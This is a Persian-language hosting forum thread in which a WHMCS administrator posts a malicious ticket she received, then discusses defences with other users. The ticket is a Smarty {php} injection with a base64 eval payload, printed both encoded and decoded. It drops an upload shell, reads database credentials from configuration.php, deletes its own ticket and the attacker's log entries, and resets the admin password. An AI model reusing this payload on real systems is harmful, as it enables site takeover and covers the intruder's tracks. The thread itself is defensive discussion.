امنیت whmcs

[maryam1]

سلام یه سوالی در مورد امنیت این سیستم داشتم
الان سیستم من لایسنس دار و آخرین ورژنه و خیلی مسائل رو هم انجام دادم توش
امروز یه تیکت برام اومد

{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlDQooIlBEOXdhSEFOQ21WamFHOGdKenhtYjNKdElHRmpkR2x 2 YmowaUlpQnRaWFJvYjJROUluQnZjM1FpSUdWdVkzUjVjR1U5SW 0xMWJIUnBjR0Z5ZEM5bWIzSnRM V1JoZEdFaUlHNWhiV1U5SW5Wd2JHOWhaR1Z5SWlCcFpEMGlkWE JzYjJGa1pYSWlQaWM3RFFwbFky aHZJQ2M4YVc1d2RYUWdkSGx3Wg0KDQpUMGlabWxzWlNJZ2JtRn RaVDBpWm1sc1pTSWdjMmw2WlQw aU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbF BTSnpkV0p0YVhRaUlHbGtQU0pm ZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSn pzTkNtbG1LQ0FrWDFCUFUxUmJK MTkxY0d3blhTQTlQU0FpVlhCcw0KDQpiMkZrSWlBcElIc05DZ2 xwWmloQVkyOXdlU2drWDBaSlRF VlRXeWRtYVd4bEoxMWJKM1J0Y0Y5dVlXMWxKMTBzSUNSZlJrbE 1SVk5iSjJacGJHVW5YVnNuYm1G dFpTZGRLU2tnZXlCbFkyaHZJQ2M4WWo1VmNHeHZZV1FnVTFWTF UwVlRJQ0VoSVR3dllqNDhZbkkN Cg0KK1BHSnlQaWM3SUgwTkNnbGxiSE5sSUhzZ1pXTm9ieUFuUE dJK1ZYQnNiMkZrSUVkQlIwRk1J Q0VoSVR3dllqNDhZbkkrUEdKeVBpYzdJSDBOQ24wTkNqOCsiKT sNCiRta2RpciA9IEBta2RpciAo ImtpbmciLDc1NSk7DQokZm8gPSBmb3Blbigia2luZy9raW5nLn BocCIsInciKTsNCmZ3cml0ZSgk Zm8sJGNvZGUpOw0KJHRleHQ9ZmlsZV9nZXRfY29udGVudHMoIm NvbmZpZ3VyYXRpb24ucGhwIik7 DQokdGV4dD0gc3RyX3JlcGxhY2UoIjw/cGhwIiwgIiIsICR0ZXh0KTsNCiR0ZXh0PSBzdHJfcmVw bGFjZSgiPD8iLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZX BsYWNlKCI/PiIsICIiLCAkdGV4 dCk7DQpldmFsKCR0ZXh0KTsNCiRkYj1teXNxbF9jb25uZWN0KC RkYl9ob3N0LCRkYl91c2VybmFt ZSwkZGJfcGFzc3dvcmQpb3IgZGllKCJDYW4ndCBvcGVuIGNvbm 5lY3Rpb24gdG8gTXlTUUwiKTsN Cm15c3FsX3NlbGVjdF9kYigkZGJfbmFtZSkgb3IgZGllKCJDYW 4ndCBzZWxlY3QgZGF0YWJhc2Ui KTsNCiRkZWxldGUgPSJERUxFVEUgZnJvbSB0Ymx0aWNrZXRzIF dIRVJFIHRpdGxlIGxpa2UgMHgy NTdCNzA2ODcwN0QyNTsiOw0KbXlzcWxfcXVlcnkoJGRlbGV0ZS k7DQokZGVsZXRlMiA9IkRFTEVU RSBmcm9tIHRibGFjdGl2aXR5bG9nICBXSEVSRSBpcGFkZHI9Jy IuJF9TRVJWRVJbJ1JFTU9URV9B RERSJ10uIic7IjsNCm15c3FsX3F1ZXJ5KCRkZWxldGUyKTsNCi RzYSA9IG15c3FsX3F1ZXJ5KCJV UERBVEUgYHRibGFkbWluc2AgU0VUIGBwYXNzd29yZGAgPSAnND I5N2Y0NGIxMzk1NTIzNTI0NWIy NDk3Mzk5ZDdhOTMnIFdIRVJFIGB0YmxhZG1pbnNgLmBpZGAgPT EgTElNSVQgMSA7Iik7DQokc2Ex ID0gbXlzcWxfcXVlcnkoIlVQREFURSBgdGJsYWRtaW5zYCBTRV QgYGFkbWluYCA9ICdhZG1pbicg V0hFUkUgYHRibGFkbWluc2AuYGlkYCA9MSBMSU1JVCAxIDsiKT s='));{/php}

معنیشم میشه

$mkdir = @mkdir ("king",755);
$fo = fopen("king/king.php","w");
fwrite($fo,$code);
$text=file_get_contents("configuration.php");
$text= str_replace("<?php", "", $text);
$text= str_replace("<?", "", $text);
$text= str_replace("?>", "", $text);
eval($text);
$db=mysql_connect($db_host,$db_username,$db_passwo rd)or die("Can't open connection to MySQL");
mysql_select_db($db_name) or die("Can't select database");
$delete ="DELETE from tbltickets WHERE title like 0x257B7068707D25;";
mysql_query($delete);
$delete2 ="DELETE from tblactivitylog WHERE ipaddr='".$_SERVER['REMOTE_ADDR']."';";
mysql_query($delete2);
$sa = mysql_query("UPDATE `tbladmins` SET `password` = '4297f44b13955235245b2497399d7a93' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");
$sa1 = mysql_query("UPDATE `tbladmins` SET `admin` = 'admin' WHERE `tbladmins`.`id` =1 LIMIT 1 ;");

الان سوال من اینه روز به روز داره این نوع هک تغییر میکنه
خدارو شکر کاری نمیتونن بکنن
اما خب سوال من اینه چه جوری میتونم نام فایل دیتابیس رو عوض کنم
طوری که اصلا دیگه به صورت پیش فرض configuration.php نباشه ادمین رو هم همین طور
یه جورایی تیبل هارو تغییر نام بدم که امنیتش دیگه بره بسیار بالاتر

---------- Post added at 01:35 PM ---------- Previous post was at 01:11 PM ----------

راهنمای نمیکنید؟
اکای خودم تا شب بررسی میکنم همین جا برا شمام میذارم

[mehdi.gh]

این تاپیک رو مطالعه کنید
شاید بتونه کمک کنه
http://www.webhostingtalk.ir/f177/37...tml#post343072

[maryam1]

ممنونم میگم امنیت رو به بالاترین حد رسوندم و این آموزش شمارو من بهترشو خودم تو این انجمن نوشتم
مشکل من تغییر نام ادمین و کانفیگ و برخی تیبل هاست
که دیگه فکر نکنم بعد از این کار عمرا هک بشه

[Mohammad_reza]

اینم یک هک جدیده و خلاقانه هم هست!
یک کدی دوستان داده بودند که داخل configuration.php قرار میدادیم و دیگه تیکت هایی که داخلش از php استفاده شده بود ، پذیرفته نمیشد! فکر می کنم اون کد کلاً مشکل تیکت رو برطرف کنه ...

[maryam1]

این تیکت ندادا از طریق ارتباط با ما فرستاد
جالبه آدرس ایمیل و آیپیشم در اختیار قرار داد مال کشور ترکیه بود

---------- Post added at 01:52 PM ---------- Previous post was at 01:51 PM ----------

بله خیلی خلاقانست برا همین میخوام تیبل ها رو تغییر نام بدم تا طرف نتونه دستور تغییر رمز عبور ادمین رو بفرسته واسه تیبل ادمین

[mehdi.gh]

شما اگه راهکار بالابردنش رو میدونین تو همین تاپیک بزارین تا ما هم استفاده کنیم
ممنون

[maryam1]

چشم ایشالا تا شب یه بلایی سرش میارم
برا بالا بردم امنیت هم میتونید
http://www.webhostingtalk.ir/f178/36259/
یه سری کارای دیگم هست مثل آپگرید به ورژن آخر
اما در مورد این هک به نظر نیازه نم فایل کانفیگ ادیت بشه تا هکر اصلا ندونه اسم فایل کانفیگ چیه که بخواد فراخوانیش کنه

[plastic]

دوستان عزیز
شما یک سوال رو جواب بدید که توی whmcs از bbcode استفاده شده؟ تنظیمات مربوط به bbcode داره؟
اگر جواب مثبت هست و تنظیماتی داره با استفاده از اون تنظیمات میشه جلوی php inject رو گرفت.

[maryam1]

ایشالا تا شب تموم یافته هامو میذارم اینجا
دست به دست هم نهیم و whmcs خود را کنیم آباد

[mehdi.gh]

ایشالا تا شب تموم یافته هامو میذارم اینجا
دست به دست هم نهیم و whmcs خود را کنیم آباد

دست در دست هم نهیم و whmcs خود را کنیم امن و امان